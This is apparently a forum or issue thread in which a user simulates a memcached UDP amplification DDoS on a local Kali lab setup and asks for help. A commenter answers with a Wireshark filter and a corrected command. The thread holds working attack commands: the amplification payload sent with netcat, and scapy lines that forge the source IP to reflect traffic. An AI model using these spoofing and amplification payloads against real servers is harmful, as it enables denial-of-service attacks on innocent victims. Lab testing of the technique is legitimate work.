649
commented
6 years ago For Wireshark, use the filter:
udp.port == 11211(You probably already know this)
For using scapy, there are some problems that I should address like you've stated, Scapy does send the traffic, I've seen it myself using the wireshark filter I provided.
Now the "src" in the IP() function is the source! (where it comes from, so like if you want you can make it look like it came from 1.3.3.7)
What you're missing is the "dst" (destination) so what you need to be doing is this:
send(IP(src='1.3.3.7', dst='127.0.0.1') / UDP(dport=11211)/Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)Also since you're doing this on python, simply "import scapy" won't work, instead do:
from scapy.all import *
Hello, I am doing a test to simulate memcache ddos. I installed memcache 1.5.4 in kali os through
aptcommand, and the memcache is listening127.0.0.1:11211First, I set a keyset a 0 0 abcdef, and get it byget athrough telnet. It works as plan. then I usepython -c "print '\0\0\0\0\0\x01\0\0get a a a a a\r\n'" | nc -nvvu 127.0.0.1 11211 > /dev/nullto simulate amplification attack, and use wireshark to capture all interfaces without setting any filter. I can see what is going on. And it works as plan too. I can see the large package returned by port 11211 But when I change the source ip address bysend(IP(src='a public ip address') / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)I can not see any response packages from port 11211, but just one package that I sent. It seems like memcache didn't response to the UDPgetcommand. Then I test:send(IP() / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)I still can not see any response packages from port 11211. Can you help me ? Thanks very much!